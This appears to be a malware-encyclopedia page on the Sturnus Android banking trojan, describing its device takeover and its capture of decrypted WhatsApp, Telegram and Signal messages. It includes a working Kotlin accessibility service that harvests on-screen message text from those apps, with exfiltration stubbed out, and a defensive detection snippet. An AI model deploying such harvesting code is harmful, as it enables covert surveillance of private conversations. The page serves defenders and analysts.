Sturnus¶
Sturnus is a privately operated Android banking trojan discovered by ThreatFabric in November 2025. Unlike most modern Android banking malware sold as MaaS, Sturnus appears to be operated exclusively by its developers. Its most notable capability is the interception of content from encrypted messaging apps, including WhatsApp, Telegram, and Signal, by reading screen content via the Accessibility Service after messages are decrypted on-device. This technique completely sidesteps end-to-end encryption without needing to break any cryptographic protocol.
Overview¶
| Attribute | Details |
|---|---|
| First Seen | November 2025 |
| Status | Active, in evaluation/tuning phase |
| Type | Banking trojan, device takeover |
| Attribution | Privately operated (not MaaS) |
| Distribution | Unknown (under investigation) |
Origin and Lineage¶
Sturnus has no known code lineage to existing Android banking trojan families. ThreatFabric's analysis identifies it as an independently developed project. The private operation model sets it apart from the dominant MaaS trend in the Android banking malware ecosystem, where families like Octo, Hook, and Medusa are rented to affiliates. Sturnus operators appear to control the full attack chain themselves, from development to deployment to fraud execution.
At the time of discovery, ThreatFabric assessed Sturnus as being in an evaluation or tuning phase, suggesting the operators are refining their techniques before scaling operations.
Distribution¶
Distribution vectors have not been publicly documented in detail. ThreatFabric's initial disclosure focused on the malware's post-installation capabilities rather than delivery mechanisms. Given the private operational model, distribution is likely targeted rather than broad, possibly through spear-phishing or social engineering campaigns directed at specific victims.
Capabilities¶
Core Features¶
| Capability | Implementation |
|---|---|
| Encrypted message capture | Reads screen content via Accessibility Service after decryption occurs on-device |
| Device takeover | Full remote control of infected devices |
| Text injection | Injects text into fields without physical interaction |
| Screen blackout | Blacks out device screen during fraud operations to hide activity |
| Accessibility abuse | Leverages Accessibility Service for screen reading, input simulation, and overlay detection |
Encrypted Messaging Interception¶
The signature capability of Sturnus is its approach to capturing content from end-to-end encrypted messaging applications. Rather than attempting to break the encryption itself, Sturnus exploits a fundamental reality of encrypted messaging: messages must be decrypted on the device for the user to read them. Once decrypted and displayed on screen, the Accessibility Service can read the content just as it would read any other on-screen text.
ThreatFabric documented that Sturnus targets WhatsApp, Telegram, and Signal, reading the rendered message text from each app's window once it is on screen.
This technique is not a cryptographic attack. It is an on-device content capture that operates after the encryption layer has already done its job. The Accessibility Service provides a legitimate API for reading screen content, originally designed for assistive technology, and Sturnus repurposes it for surveillance. For more on how Android malware abuses this permission, see Accessibility Abuse.
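The following is an added illustrative example, not Sturnus code and not taken from ThreatFabric's report: a minimal AccessibilityService that harvests rendered text from the three messengers named above. It is here to make the mechanism concrete. The package name `example.a11y`, the class name, and the `Log`-based stand-in for exfiltration are assumptions; the three target package identifiers are the apps' real ones. Like any accessibility service, it only works after the user has enabled it in Settings, which is the step Android banking trojans social-engineer.

```kotlin
// Added example (not Sturnus's code). Manifest needs a <service> with
// android.permission.BIND_ACCESSIBILITY_SERVICE and an accessibility-service XML
// declaring canRetrieveWindowContent="true" and
// accessibilityEventTypes="typeWindowContentChanged|typeWindowStateChanged".
package example.a11y   // hypothetical package name

import android.accessibilityservice.AccessibilityService
import android.util.Log
import android.view.accessibility.AccessibilityEvent
import android.view.accessibility.AccessibilityNodeInfo

class ScreenReaderService : AccessibilityService() {
    // Real package IDs of the apps the page lists.
    private val targets = setOf(
        "com.whatsapp",               // WhatsApp
        "org.telegram.messenger",     // Telegram
        "org.thoughtcrime.securesms", // Signal
    )

    override fun onAccessibilityEvent(event: AccessibilityEvent) {
        val pkg = event.packageName?.toString() ?: return
        if (pkg !in targets) return
        if (event.eventType != AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED &&
            event.eventType != AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED) return

        // rootInActiveWindow is the already-decrypted, rendered view tree:
        // no cryptography is touched, the app did the decryption itself.
        val root = rootInActiveWindow ?: return
        val lines = mutableListOf<String>()
        collectText(root, lines)
        if (lines.isNotEmpty()) exfiltrate(pkg, lines)
    }

    // Depth-first walk collecting every visible text and content description.
    private fun collectText(node: AccessibilityNodeInfo, out: MutableList<String>) {
        node.text?.toString()?.takeIf { it.isNotBlank() }?.let(out::add)
        node.contentDescription?.toString()?.takeIf { it.isNotBlank() }?.let(out::add)
        for (i in 0 until node.childCount) {
            node.getChild(i)?.let { collectText(it, out) }
        }
    }

    // Stand-in for the C2 upload; Sturnus's real transport has not been published.
    private fun exfiltrate(pkg: String, lines: List<String>) {
        Log.d("ScreenReader", "$pkg: ${lines.joinToString(" | ")}")
    }

    override fun onInterrupt() { /* nothing to release */ }
}
```

Two caveats for defenders. `FLAG_SECURE` (Signal's "screen security" option, for instance) blocks screenshots and MediaProjection capture but does not stop an accessibility service from reading node text, so it is no defence against this technique. Since Android 14 (API 34) a view can be marked `accessibilityDataSensitive`, which restricts its content to services that declare `isAccessibilityTool`; a sideloaded malicious service can declare that flag too, so this narrows exposure rather than closing it.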
Device Takeover¶
Sturnus provides full device takeover capability, allowing operators to:
- Navigate the device remotely as if holding it
- Inject text into any input field without physical interaction
- Black out the device screen during fraud operations so the victim sees nothing
- Execute banking fraud while the device appears powered off or inactive
The screen blackout technique is shared with other device takeover trojans like Octo and Hook, where the operator dims brightness to zero and displays a black overlay to mask remote activity.
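Both the message capture and the device takeover described above depend on a malicious accessibility service being enabled, so the first triage question on a suspect device is which services are enabled and whether each is expected. The following is an added example, not the page's or any vendor's code: a pure-Kotlin check that a banking app's runtime protection or an analyst's tooling can apply to the value of `Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES`, which is the same colon-separated `package/ServiceClass` string that `adb shell settings get secure enabled_accessibility_services` prints. The sample string and the allowlist are constructed for illustration.

```kotlin
// Added example (not from the original page). Input format: entries such as
// "com.pkg/com.pkg.SvcClass" or the shorthand "com.pkg/.SvcClass", joined by ':'.
// The shell command prints the literal string "null" when nothing is enabled.
fun suspiciousAccessibilityServices(
    enabled: String?,
    allowedPackages: Set<String>,
): List<String> {
    if (enabled.isNullOrBlank() || enabled == "null") return emptyList()
    return enabled.split(':')
        .map { it.trim() }
        .filter { it.isNotEmpty() }
        .filter { entry -> entry.substringBefore('/') !in allowedPackages }
}

fun main() {
    // Constructed sample: TalkBack (legitimate) plus a service registered by a
    // hypothetical dropper package; the second entry is the kind a responder wants flagged.
    val sample =
        "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:" +
        "com.example.sysupdate/.SvcA11y"
    val allowed = setOf("com.google.android.marvin.talkback", "com.android.talkback")

    val flagged = suspiciousAccessibilityServices(sample, allowed)
    // flagged == ["com.example.sysupdate/.SvcA11y"]
    println(if (flagged.isEmpty()) "no unexpected accessibility services" else "flag: $flagged")

    // The unset case must not trip the check.
    check(suspiciousAccessibilityServices("null", allowed).isEmpty())
}
```

Inside an app the same string comes from `Settings.Secure.getString(contentResolver, Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES)`; the allowlist should hold only the assistive-technology packages your user base actually needs, since an allowlist that is too broad is exactly what a dropper with a plausible package name relies on.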
Technical Details¶
C2 Communication¶
Technical details of Sturnus's C2 infrastructure have not been fully disclosed by ThreatFabric in the initial publication. Further technical indicators may emerge as the family matures beyond its current evaluation phase.
Anti-Analysis¶
As a privately operated trojan still in its tuning phase, detailed anti-analysis techniques have not yet been extensively documented. The private operation model itself serves as a form of evasion, as the limited sample distribution makes it harder for security vendors to obtain and analyze specimens compared to widely distributed MaaS families.
Target Regions¶
| Region | Status |
|---|---|
| Southern Europe | Primary target region |
| Central Europe | Primary target region |
ThreatFabric's report identifies Southern and Central Europe as the current target geography. The specific financial institutions targeted have not been publicly enumerated.
Notable Campaigns¶
November 2025: ThreatFabric publishes the discovery of Sturnus, highlighting its ability to capture content from encrypted messaging apps by reading screen content via Accessibility Service. The trojan is assessed as being in an evaluation/tuning phase with a private operational model targeting Southern and Central European victims.
Related Families¶
Sturnus joins a growing set of Android banking trojans with full device takeover capability. Octo popularized remote control through MediaProjection screen streaming. Hook built on the Cerberus/Ermac lineage to offer VNC-based remote access. Medusa combines screen streaming with keylogging. What distinguishes Sturnus is the explicit focus on encrypted messaging content capture, a capability that other families could implement with the same Accessibility Service access but have not prioritized as a core feature.
The encrypted messaging interception technique represents a broader trend in mobile malware: rather than attacking the encryption protocol, attackers target the endpoints where data exists in plaintext. This is the same principle behind SparkCat and SpyAgent stealing cryptocurrency seed phrases via OCR from device photos, targeting the moment when sensitive data is visible rather than when it is protected in transit.